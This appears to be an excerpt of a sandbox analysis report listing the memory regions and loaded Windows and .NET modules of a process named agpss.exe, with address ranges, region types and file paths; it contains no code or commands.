id = 2810
start_va = 0xee0000
end_va = 0xfa9fff
monitored = 1
entry_point = 0xfa4c4e
region_type = mapped_file
name = "agpss.exe"
filename = "\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")
Region:
id = 2811
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2812
start_va = 0x77490000
end_va = 0x7760ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 2813
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 2814
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 2815
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 2816
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 2817
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2818
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2819
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 2820
start_va = 0x390000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2821
start_va = 0x73c20000
end_va = 0x73c5efff
monitored = 0
entry_point = 0x73c4e088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 2822
start_va = 0x73bc0000
end_va = 0x73c1bfff
monitored = 0
entry_point = 0x73bff9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 2823
start_va = 0x73bb0000
end_va = 0x73bb7fff
monitored = 0
entry_point = 0x73bb20f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2824
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2825
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2826
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2827
start_va = 0x77190000
end_va = 0x772aefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077190000"
filename = ""
Region:
id = 2828
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2829
start_va = 0x77090000
end_va = 0x77189fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000077090000"
filename = ""
Region:
id = 2830
start_va = 0x590000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2831
start_va = 0x73a90000
end_va = 0x73ad9fff
monitored = 1
entry_point = 0x73a92e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 2832
start_va = 0x76b80000
end_va = 0x76c8ffff
monitored = 0
entry_point = 0x76b93283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2833
start_va = 0x75160000
end_va = 0x751a6fff
monitored = 0
entry_point = 0x751674c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2834
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2835
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2836
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2837
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2838
start_va = 0x810000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 2839
start_va = 0x9c0000
end_va = 0xbaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009c0000"
filename = ""
Region:
id = 2840
start_va = 0x76a50000
end_va = 0x76aeffff
monitored = 0
entry_point = 0x76a649e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2841
start_va = 0x75670000
end_va = 0x7571bfff
monitored = 0
entry_point = 0x7567a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2842
start_va = 0x75500000
end_va = 0x75518fff
monitored = 0
entry_point = 0x75504975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2843
start_va = 0x75310000
end_va = 0x753fffff
monitored = 0
entry_point = 0x75320569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2844
start_va = 0x74fe0000
end_va = 0x7503ffff
monitored = 0
entry_point = 0x74ffa3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2845
start_va = 0x74fd0000
end_va = 0x74fdbfff
monitored = 0
entry_point = 0x74fd10e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2846
start_va = 0xbb0000
end_va = 0xd9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 2847
start_va = 0x73930000
end_va = 0x739bcfff
monitored = 1
entry_point = 0x73942860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 2852
start_va = 0x73a80000
end_va = 0x73a82fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 2857
start_va = 0x751e0000
end_va = 0x75236fff
monitored = 0
entry_point = 0x751f9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2858
start_va = 0x76af0000
end_va = 0x76b7ffff
monitored = 0
entry_point = 0x76b06343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2859
start_va = 0x76c90000
end_va = 0x76d8ffff
monitored = 0
entry_point = 0x76cab6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2860
start_va = 0x77460000
end_va = 0x77469fff
monitored = 0
entry_point = 0x774636a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2861
start_va = 0x75270000
end_va = 0x7530cfff
monitored = 0
entry_point = 0x752a3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2862
start_va = 0x810000
end_va = 0x997fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 2863
start_va = 0x9b0000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 2864
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2865
start_va = 0x20000
end_va = 0x3dfff
monitored = 0
entry_point = 0x3158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2866
start_va = 0x769a0000
end_va = 0x769fffff
monitored = 0
entry_point = 0x769b158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2867
start_va = 0x75040000
end_va = 0x7510bfff
monitored = 0
entry_point = 0x7504168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2868
start_va = 0x9c0000
end_va = 0xb40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009c0000"
filename = ""
Region:
id = 2869
start_va = 0xb70000
end_va = 0xbaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b70000"
filename = ""
Region:
id = 2870
start_va = 0xfb0000
end_va = 0x23affff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fb0000"
filename = ""
Region:
id = 2871
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2872
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2874
start_va = 0x140000
end_va = 0x203fff
monitored = 1
entry_point = 0x204c4e
region_type = mapped_file
name = "agpss.exe"
filename = "\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")
Region:
id = 2875
start_va = 0x140000
end_va = 0x203fff
monitored = 1
entry_point = 0x204c4e
region_type = mapped_file
name = "agpss.exe"
filename = "\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")
Region:
id = 2876
start_va = 0x74fb0000
end_va = 0x74fb8fff
monitored = 0
entry_point = 0x74fb1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2906
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2907
start_va = 0x74050000
end_va = 0x747fefff
monitored = 1
entry_point = 0x7406d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2908
start_va = 0x74800000
end_va = 0x74faefff
monitored = 1
entry_point = 0x7481d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 2909
start_va = 0x73b90000
end_va = 0x73ba3fff
monitored = 0
entry_point = 0x73b9ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 2910
start_va = 0x73ae0000
end_va = 0x73b8afff
monitored = 0
entry_point = 0x73b75f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 2911
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 2912
start_va = 0x80000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 2913
start_va = 0x140000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 2914
start_va = 0x150000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2915
start_va = 0x160000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2916
start_va = 0x170000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2917
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 2918
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 2919
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 2920
start_va = 0x1b0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2921
start_va = 0x390000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2922
start_va = 0x510000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 2923
start_va = 0x430000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2924
start_va = 0x480000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2925
start_va = 0x5b0000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 2926
start_va = 0x710000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 2927
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 2928
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2929
start_va = 0x1c0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2930
start_va = 0x23b0000
end_va = 0x43affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 2931
start_va = 0x390000
end_va = 0x42ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 2932
start_va = 0xc40000
end_va = 0xc7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c40000"
filename = ""
Region:
id = 2933
start_va = 0xd90000
end_va = 0xd9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d90000"
filename = ""
Region:
id = 2934
start_va = 0x4400000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 2935
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 2936
start_va = 0x220000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 2937
start_va = 0x4510000
end_va = 0x460ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004510000"
filename = ""
Region:
id = 2938
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 2939
start_va = 0x4610000
end_va = 0x48defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2948
start_va = 0x72520000
end_va = 0x7392afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 2970
start_va = 0x75850000
end_va = 0x759abfff
monitored = 0
entry_point = 0x7589ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 2971
start_va = 0x74610000
end_va = 0x7468ffff
monitored = 0
entry_point = 0x746237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 2975
start_va = 0x48e0000
end_va = 0x4aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048e0000"
filename = ""
Region:
id = 2976
start_va = 0xc80000
end_va = 0xd5efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c80000"
filename = ""
Region:
id = 2979
start_va = 0x1b0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 3100
start_va = 0x74600000
end_va = 0x74602fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 3101
start_va = 0x74570000
end_va = 0x745f8fff
monitored = 1
entry_point = 0x74571130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 3102
start_va = 0x759b0000
end_va = 0x75a3efff
monitored = 0
entry_point = 0x759b3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 3103
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 3104
start_va = 0x71ac0000
end_va = 0x72514fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 3105
start_va = 0x743c0000
end_va = 0x74562fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.drawing.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll")
Region:
id = 3106
start_va = 0x70c50000
end_va = 0x71ab5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.windows.forms.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll")
Region:
id = 3107
start_va = 0x73e10000
end_va = 0x743b3fff
monitored = 1
entry_point = 0x7439b692
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 3108
start_va = 0x210000
end_va = 0x211fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 3110
start_va = 0x70430000
end_va = 0x70c47fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 3111
start_va = 0x742b0000
end_va = 0x743b4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll")
Region:
id = 3112
start_va = 0x260000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 3113
start_va = 0x6fcb0000
end_va = 0x70423fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 3114
start_va = 0x74290000
end_va = 0x742a2fff
monitored = 1
entry_point = 0x7429d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 3115
start_va = 0x4ab0000
end_va = 0x4d81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 3116
start_va = 0x75c40000
end_va = 0x76889fff
monitored = 0
entry_point = 0x75cc1601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 3117
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 3118
start_va = 0x74280000
end_va = 0x7428afff
monitored = 0
entry_point = 0x74281992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 3119
start_va = 0x48e0000
end_va = 0x4a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048e0000"
filename = ""
Region:
id = 3120
start_va = 0x4a70000
end_va = 0x4aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a70000"
filename = ""
Region:
id = 3121
start_va = 0x74260000
end_va = 0x74276fff
monitored = 0
entry_point = 0x742635fa
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 3122
start_va = 0x74240000
end_va = 0x74256fff
monitored = 0
entry_point = 0x74243573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 3123
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3124
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3125
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3126
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3127
start_va = 0x4c0000
end_va = 0x4fbfff
monitored = 0
entry_point = 0x4c128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3128
start_va = 0x74200000
end_va = 0x7423afff
monitored = 0
entry_point = 0x7420128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3129
start_va = 0xbb0000
end_va = 0xc31fff
monitored = 0
entry_point = 0xbb19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3130
start_va = 0xbb0000
end_va = 0xc31fff
monitored = 0
entry_point = 0xbb19a9
region_type = mapped_file
name = "comctl32.dll"
